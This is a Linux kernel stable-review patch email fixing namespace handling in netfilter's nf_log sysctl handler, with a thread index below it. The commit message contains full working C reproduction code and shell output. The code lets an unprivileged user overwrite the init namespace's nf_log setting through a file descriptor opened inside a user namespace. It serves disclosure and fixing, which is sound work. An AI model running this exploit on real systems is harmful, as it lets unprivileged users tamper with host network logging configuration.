From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
stable@vger.kernel.org, Jann Horn <jann@thejh.net>,
Pablo Neira Ayuso <pablo@netfilter.org>
Subject: [PATCH 4.4 38/38] netfilter: fix namespace handling in nf_log_proc_dostring
Date: Thu, 17 Nov 2016 11:33:16 +0100 [thread overview]
Message-ID: <20161117103238.093810832@linuxfoundation.org> (raw)
In-Reply-To: <20161117103236.423602981@linuxfoundation.org>
4.4-stable review patch. If anyone has any objections, please let me know.
------------------
From: Jann Horn <jann@thejh.net>
commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
net/netfilter/nf_log.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -401,7 +401,7 @@ static int nf_log_proc_dostring(struct c
size_t size = *lenp;
int r = 0;
int tindex = (unsigned long)table->extra1;
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = table->extra2;
if (write) {
if (size > sizeof(buf))
@@ -453,7 +453,6 @@ static int netfilter_log_sysctl_init(str
3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
- nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -463,6 +462,9 @@ static int netfilter_log_sysctl_init(str
}
}
+ for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+ table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
next prev parent reply other threads:[~2016-11-17 10:40 UTC|newest]
Thread overview: 38+ messages / expand[flat|nested] mbox.gz Atom feed top
2016-11-17 10:32 [PATCH 4.4 00/38] 4.4.33-stable review Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 01/38] ALSA: info: Return error for invalid read/write Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 02/38] ALSA: info: Limit the proc text input size Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 03/38] ASoC: cs4270: fix DAPM stream name mismatch Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 05/38] swapfile: fix memory corruption via malformed swapfile Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 06/38] coredump: fix unfreezable coredumping task Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 07/38] s390/hypfs: Use get_free_page() instead of kmalloc to ensure page alignment Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 08/38] ARC: timer: rtc: implement read loop in "C" vs. inline asm Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 09/38] pinctrl: cherryview: Serialize register access in suspend/resume Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 10/38] pinctrl: cherryview: Prevent possible interrupt storm on resume Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 11/38] staging: iio: ad5933: avoid uninitialized variable in error case Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 12/38] drivers: staging: nvec: remove bogus reset command for PS/2 interface Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 13/38] Revert "staging: nvec: ps2: change serio type to passthrough" Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 14/38] staging: nvec: remove managed resource from PS2 driver Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 15/38] USB: cdc-acm: fix TIOCMIWAIT Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 17/38] drbd: Fix kernel_sendmsg() usage - potential NULL deref Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 18/38] toshiba-wmi: Fix loading the driver on non Toshiba laptops Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 19/38] clk: qoriq: Dont allow CPU clocks higher than starting value Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 20/38] iio: hid-sensors: Increase the precision of scale to fix wrong reading interpretation Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 21/38] iio: orientation: hid-sensor-rotation: Add PM function (fix non working driver) Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 22/38] scsi: qla2xxx: Fix scsi scan hang triggered if adapter fails during init Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 23/38] scsi: mpt3sas: Fix for block device of raid exists even after deleting raid disk Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 24/38] KVM: MIPS: Precalculate MMIO load resume PC Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 26/38] dmaengine: at_xdmac: fix spurious flag status for mem2mem transfers Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 28/38] iommu/amd: Free domain id when free a domain of struct dma_ops_domain Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 29/38] iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 30/38] mei: bus: fix received data size check in NFC fixup Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 31/38] lib/genalloc.c: start search from start of chunk Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 32/38] hwrng: core - Dont use a stack buffer in add_early_randomness() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 33/38] i40e: fix call of ndo_dflt_bridge_getlink() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 34/38] ACPI / APEI: Fix incorrect return value of ghes_proc() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 35/38] ASoC: sun4i-codec: return error code instead of NULL when create_card fails Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 36/38] mmc: mxs: Initialize the spinlock prior to using it Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 37/38] btrfs: qgroup: Prevent qgroup->reserved from going subzero Greg Kroah-Hartman
2016-11-17 10:33 ` Greg Kroah-Hartman [this message]
2016-11-17 11:03 ` [PATCH 4.4 38/38] netfilter: fix namespace handling in nf_log_proc_dostring Pablo Neira Ayuso
2016-11-17 12:01 ` Greg Kroah-Hartman
2016-11-17 22:22 ` [PATCH 4.4 00/38] 4.4.33-stable review Guenter Roeck
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20161117103238.093810832@linuxfoundation.org \
--to=gregkh@linuxfoundation.org \
--cc=jann@thejh.net \
--cc=linux-kernel@vger.kernel.org \
--cc=pablo@netfilter.org \
--cc=stable@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.